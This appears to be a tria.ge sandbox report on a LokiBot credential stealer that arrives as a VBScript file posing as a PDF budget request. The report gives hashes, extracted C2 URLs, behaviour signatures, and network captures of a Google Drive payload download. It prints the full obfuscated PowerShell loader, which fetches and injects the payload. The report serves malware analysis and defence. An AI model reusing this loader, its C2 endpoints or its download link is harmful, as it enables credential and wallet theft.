Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

PERMINTAAN...df.vbs

windows7-x64

10

PERMINTAAN...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30/09/2024, 20:57 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.vbs

  • Size

    72KB

  • MD5

    cf3ce0d565b919fe45d02705736fe824

  • SHA1

    0924076c6434b432b18fd0b298a2b5b14e38b754

  • SHA256

    96c1a11d9036afc58f65d8533f2c37b7fc64048e21bc60f28f0bb9311902e80f

  • SHA512

    eb44246e1c25d9cfcb49f724f710b21432fb8fab17b1344c3af142ef5959542a01db052db1e02b8f9af1df07872d3508fa99718a95260440b450bcee035fc431

  • SSDEEP

    1536:sTgvWHbK7HAM/TkMCV5i+8Q5+h+4C/hNGweE+f:sTgeMAITO8QS+lkf

Score
10/10
lokibotcollectiondiscoveryexecutionspywarestealertrojan

Malware Config

Extracted

Family

lokibot

C2

http://137.184.191.215/index.php/check.php?s=am9ntjjw

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Blocklisted process makes network request 11 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2792
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsnehlAdrenTVar,iyLat.rpFib seCythe],ermi:Aaben:Alei TR diolGrftesSolhj1 smad2Tubel ');$Tessituras160=$trebanen[0];$saurels=(Preeliminator 'algo,$Hepp.gRearrlSweenoAllerbD oleaAfgifLEfter:F lberBadgeeBaadfP,uperEKarritOpkl,iKrsantElledi RestO LiqunAmin ASekunR I.teYDiplo=Tran NMag,eE MisiWputre-NatarONd inbForldjR ulmeBasisCMidenTNonn. Rec.nSCac.cyCapriSO,idetPo,ygEsmaasMArcha.Flo snD pliEDemiotSt ns.Stam wB nebeSkrumbRep ocUdgralglitti Sm kE eklaN P.antvaler ');Glederens ($saurels);Glederens (Preeliminator ' Unsc$Limi.Rungare.edsppAmbuleSurintM,untiStrint,ovediPartso BalanCas,faLarrur MillyPerni.Em erHSkbneeTitteaP,otodRoyale Blksr ,ills rga[Omkr $IndfdM OvereRa iul fsbtHocklomousin krue]Asper=torre$ .icrSpamfipBlu pikontrsUndereCrossfSerabrSyntei CharkuratuvEddicaAh ldr ,rantkompoeEny lrHypaceNonqutFaglo ');$Band=Preeliminator 'Petau$nykalRDykkee St.rp MadoeCautitMyrici BlomtEpigri PreaoSt ernBasilaOsterrBankrydomes.Til gDFolkeoRemovwIn imn.krivlAf ilo Kursa Fa ldKnaldFBerthiOpfanlablace nat(Vir e$P.rseTRhinoeSammesArccosOverdiPangetx loguRegnorConyzaNon.osSva m1Pr nt6 Pell0Surre,Legul$ KawcBS unklCo.ntaOrdfjdSeriesAlette ,kanlC rollSvolveForeprTreski U ar) Hy,e ';$Bladselleri=$Verdenshistoriskes;Glederens (Preeliminator 'vitam$U irkGFarveLechoiOR litB eriAOvervLMishm:ProviUAkamndGalacSMonogTDi raiR,stbl etiLUdskreOverstaglyc=Dephl(Ge yrtAgerjEFremssPaupeTSacri-FiskepCl ngAsurpaTSchizhBlot Fdsel$ B atbBallylGj rdafrancDTh.otSMicroESoci,LB,uxiLTricoEAppriRFj,rdiMal,i)Smls ');while (!$Udstillet) {Glederens (Preeliminator 'Urede$St.ejg MetolCou soBeskfb SlgeaD athlgasap: ashlITelfonOversv TirsaNo malSsonaiBrug dAlthoeTailopSt kne Physn Sagas,rissiE bezo.accin rugsbl ck= Torv$ KelptArkairUnupbu Tet.e va.e ') ;Glederens $Band;Glederens (Preeliminator 'KoordSCykeltClarkaLiebhr MarktTusin-BrnehSDelkllRen,eeRe peeAbstrpUnco Intui4 Moan ');Glederens (Preeliminator 'm,tth$ NipsgNot rl Cai.o LoesbReearaBoplsl nden:EclipUGalocd lomssNo,imtGrafiiOverllMisfolHete eAn,latSydam=Afsti(PlaneT Amuzec,rsosGummitElevc-Ind rPStrafaOvah.twowi,h pent Permi$ OverB Wal l varmaAut cdHainasR,sbeecardilPrecol ProleEmissrSu.eriDolph)S urp ') ;Glederens (Preeliminator ' Kay $Pu slgChervlclodpoKlingb Geoma pklalS,rre:GalliASoricnRomertOve pi Duehk Un.evDe,tea IncorSkriniBeforafjerbtMor.i= Z,nt$UgenngEnv,ilKonseo,ibiabCensuam strl Bl,n: Sam.Tearwio Noniu W rksFrem lKirkeiOp.arnbetingHuser+Jul s+ igma%Nas e$ D.tetUnshrr,aandeAltanbGeneraadre nHandeeWintenLitho. pfancPerfoo prruKomman .gentH,nli ') ;$Tessituras160=$trebanen[$Antikvariat];}$Getlingndsunknes198=318869;$Negrita=32225;Glederens (Preeliminator 'Mo,fa$UddykgPresulInteroKollebOverlaNema l equi:UdbliPOverloCocond oldaa rounr ReligTrammeCalor Coxc= Co s ProfeGSheareE imytP odu-KultuCrulleoMisaln,iggit yline ombenPrecut Erig umy,d$ ko pB Hem l rminaI,dekd.ravlsSp.cieMaa el CabolCac ee kolrShtchiGoka ');Glederens (Preeliminator 'Hobna$Deka,gConf.lbe,vroDybs,bJessiaBerewl desi:TilstShor,euArlanpHyptre PerirCur ecOpvasa.osadrArgumg Fed,o IdiosStupe Ener=Margi Geofy[LapidS adeay elarsKo eatBev eePrehumlamia. ,alaCZornuo Un enBega vDiploe iscrNeddytRetsh]Balan: Skif:FedteFErnrirI,eogoUndermCre yBUnm.caErgoms ConseAver 6Re re4TavleSfugletchancrFdreliMessenPassagExpon(Nstfo$ EnnaPDi tio Sigtd ,oraaD vnsr MahjgCloyleSkatt)gulds ');Glederens (Preeliminator 'R pub$ RibbgToothlFugleo St ab HoflaForstlMeddl:por,vTTvrstoMashmn.edaieTrucul Sm,aeWishej ngreBefootadgans.abar C,ika= Groo minar[ Dra.S tuthyPseuds Teletsamree StrumLu er.overdTSv neeEcle xMediot Gill.SobreEs.norn ReficSata,o N.tadTatteiF nsenFimengLatir].eign: itro:Cyke.A GlemSFiskeClg dgI umynI,lind. TotaGSphagepseudtEneboSBestvtDybb rmelleiB,quan ensagDimid(Buder$Ag veSTimokuParafp UdgieTvan rKumulc gejlaMumblrfrivogKo meoWaspisUnder)Bru e ');Glederens (Preeliminator 'Iri e$TamergTu,nelAsepso okumbUntenaF derlTi li:Prut PFo ndfr.emig p in=Rygep$ pa.tTTirehoVkstrnBaronehirudlPaviseVelrvjSnuereVan,ltRukbasTr si.OmstnsAffutuOutspbUnpeds Veint Brutr Ruski Kas,nUncaug Lowl(Masse$ForldGOver.eIldfut ,ttalDeseciSkra nBighogImprinstuehdCha.cs.bbatuOvercnBondukStrepnSubtre Mon,s apit1Opbe.9Taeni8Inter,Ti,st$CatnaNPh ageSwinkgko.terRobiniR.lent InveaTmrer)Sky d ');Glederens $Pfg;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2888
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsnehlAdrenTVar,iyLat.rpFib seCythe],ermi:Aaben:Alei TR diolGrftesSolhj1 smad2Tubel ');$Tessituras160=$trebanen[0];$saurels=(Preeliminator 'algo,$Hepp.gRearrlSweenoAllerbD oleaAfgifLEfter:F lberBadgeeBaadfP,uperEKarritOpkl,iKrsantElledi RestO LiqunAmin ASekunR I.teYDiplo=Tran NMag,eE MisiWputre-NatarONd inbForldjR ulmeBasisCMidenTNonn. Rec.nSCac.cyCapriSO,idetPo,ygEsmaasMArcha.Flo snD pliEDemiotSt ns.Stam wB nebeSkrumbRep ocUdgralglitti Sm kE eklaN P.antvaler ');Glederens ($saurels);Glederens (Preeliminator ' Unsc$Limi.Rungare.edsppAmbuleSurintM,untiStrint,ovediPartso BalanCas,faLarrur MillyPerni.Em erHSkbneeTitteaP,otodRoyale Blksr ,ills rga[Omkr $IndfdM OvereRa iul fsbtHocklomousin krue]Asper=torre$ .icrSpamfipBlu pikontrsUndereCrossfSerabrSyntei CharkuratuvEddicaAh ldr ,rantkompoeEny lrHypaceNonqutFaglo ');$Band=Preeliminator 'Petau$nykalRDykkee St.rp MadoeCautitMyrici BlomtEpigri PreaoSt ernBasilaOsterrBankrydomes.Til gDFolkeoRemovwIn imn.krivlAf ilo Kursa Fa ldKnaldFBerthiOpfanlablace nat(Vir e$P.rseTRhinoeSammesArccosOverdiPangetx loguRegnorConyzaNon.osSva m1Pr nt6 Pell0Surre,Legul$ KawcBS unklCo.ntaOrdfjdSeriesAlette ,kanlC rollSvolveForeprTreski U ar) Hy,e ';$Bladselleri=$Verdenshistoriskes;Glederens (Preeliminator 'vitam$U irkGFarveLechoiOR litB eriAOvervLMishm:ProviUAkamndGalacSMonogTDi raiR,stbl etiLUdskreOverstaglyc=Dephl(Ge yrtAgerjEFremssPaupeTSacri-FiskepCl ngAsurpaTSchizhBlot Fdsel$ B atbBallylGj rdafrancDTh.otSMicroESoci,LB,uxiLTricoEAppriRFj,rdiMal,i)Smls ');while (!$Udstillet) {Glederens (Preeliminator 'Urede$St.ejg MetolCou soBeskfb SlgeaD athlgasap: ashlITelfonOversv TirsaNo malSsonaiBrug dAlthoeTailopSt kne Physn Sagas,rissiE bezo.accin rugsbl ck= Torv$ KelptArkairUnupbu Tet.e va.e ') ;Glederens $Band;Glederens (Preeliminator 'KoordSCykeltClarkaLiebhr MarktTusin-BrnehSDelkllRen,eeRe peeAbstrpUnco Intui4 Moan ');Glederens (Preeliminator 'm,tth$ NipsgNot rl Cai.o LoesbReearaBoplsl nden:EclipUGalocd lomssNo,imtGrafiiOverllMisfolHete eAn,latSydam=Afsti(PlaneT Amuzec,rsosGummitElevc-Ind rPStrafaOvah.twowi,h pent Permi$ OverB Wal l varmaAut cdHainasR,sbeecardilPrecol ProleEmissrSu.eriDolph)S urp ') ;Glederens (Preeliminator ' Kay $Pu slgChervlclodpoKlingb Geoma pklalS,rre:GalliASoricnRomertOve pi Duehk Un.evDe,tea IncorSkriniBeforafjerbtMor.i= Z,nt$UgenngEnv,ilKonseo,ibiabCensuam strl Bl,n: Sam.Tearwio Noniu W rksFrem lKirkeiOp.arnbetingHuser+Jul s+ igma%Nas e$ D.tetUnshrr,aandeAltanbGeneraadre nHandeeWintenLitho. pfancPerfoo prruKomman .gentH,nli ') ;$Tessituras160=$trebanen[$Antikvariat];}$Getlingndsunknes198=318869;$Negrita=32225;Glederens (Preeliminator 'Mo,fa$UddykgPresulInteroKollebOverlaNema l equi:UdbliPOverloCocond oldaa rounr ReligTrammeCalor Coxc= Co s ProfeGSheareE imytP odu-KultuCrulleoMisaln,iggit yline ombenPrecut Erig umy,d$ ko pB Hem l rminaI,dekd.ravlsSp.cieMaa el CabolCac ee kolrShtchiGoka ');Glederens (Preeliminator 'Hobna$Deka,gConf.lbe,vroDybs,bJessiaBerewl desi:TilstShor,euArlanpHyptre PerirCur ecOpvasa.osadrArgumg Fed,o IdiosStupe Ener=Margi Geofy[LapidS adeay elarsKo eatBev eePrehumlamia. ,alaCZornuo Un enBega vDiploe iscrNeddytRetsh]Balan: Skif:FedteFErnrirI,eogoUndermCre yBUnm.caErgoms ConseAver 6Re re4TavleSfugletchancrFdreliMessenPassagExpon(Nstfo$ EnnaPDi tio Sigtd ,oraaD vnsr MahjgCloyleSkatt)gulds ');Glederens (Preeliminator 'R pub$ RibbgToothlFugleo St ab HoflaForstlMeddl:por,vTTvrstoMashmn.edaieTrucul Sm,aeWishej ngreBefootadgans.abar C,ika= Groo minar[ Dra.S tuthyPseuds Teletsamree StrumLu er.overdTSv neeEcle xMediot Gill.SobreEs.norn ReficSata,o N.tadTatteiF nsenFimengLatir].eign: itro:Cyke.A GlemSFiskeClg dgI umynI,lind. TotaGSphagepseudtEneboSBestvtDybb rmelleiB,quan ensagDimid(Buder$Ag veSTimokuParafp UdgieTvan rKumulc gejlaMumblrfrivogKo meoWaspisUnder)Bru e ');Glederens (Preeliminator 'Iri e$TamergTu,nelAsepso okumbUntenaF derlTi li:Prut PFo ndfr.emig p in=Rygep$ pa.tTTirehoVkstrnBaronehirudlPaviseVelrvjSnuereVan,ltRukbasTr si.OmstnsAffutuOutspbUnpeds Veint Brutr Ruski Kas,nUncaug Lowl(Masse$ForldGOver.eIldfut ,ttalDeseciSkra nBighogImprinstuehdCha.cs.bbatuOvercnBondukStrepnSubtre Mon,s apit1Opbe.9Taeni8Inter,Ti,st$CatnaNPh ageSwinkgko.terRobiniR.lent InveaTmrer)Sky d ');Glederens $Pfg;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:860
    • C:\Windows\syswow64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:2616

Network

  • flag-us
    DNS
    drive.google.com
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.google.com
    IN A
    Response
    drive.google.com
    IN A
    142.250.187.206
  • flag-gb
    GET
    https://drive.google.com/uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7
    powershell.exe
    Remote address:
    142.250.187.206:443
    Request
    GET /uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: drive.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Sep 2024 20:57:11 GMT
    Location: https://drive.usercontent.google.com/download?id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7&export=download
    Strict-Transport-Security: max-age=31536000
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: script-src 'nonce-g-aEjppMivEemuAbVy4P2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    drive.usercontent.google.com
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.usercontent.google.com
    IN A
    Response
    drive.usercontent.google.com
    IN A
    142.250.179.225
  • flag-gb
    GET
    https://drive.usercontent.google.com/download?id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7&export=download
    powershell.exe
    Remote address:
    142.250.179.225:443
    Request
    GET /download?id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="Catrine.pfb"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, 